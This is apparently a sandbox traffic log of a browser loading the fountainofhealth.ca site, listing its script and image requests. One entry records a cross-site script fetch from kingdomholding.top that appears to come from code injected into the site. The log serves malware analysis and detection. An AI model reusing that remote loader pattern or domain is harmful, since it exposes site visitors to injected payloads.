Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/custom.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/theme.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/popover.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/modal.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.ajax.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/js/views_slideshow.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/dialog.ajax.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /libraries/json2/json2.js?v=2 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ss/index.php?FLeFJ5nY HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
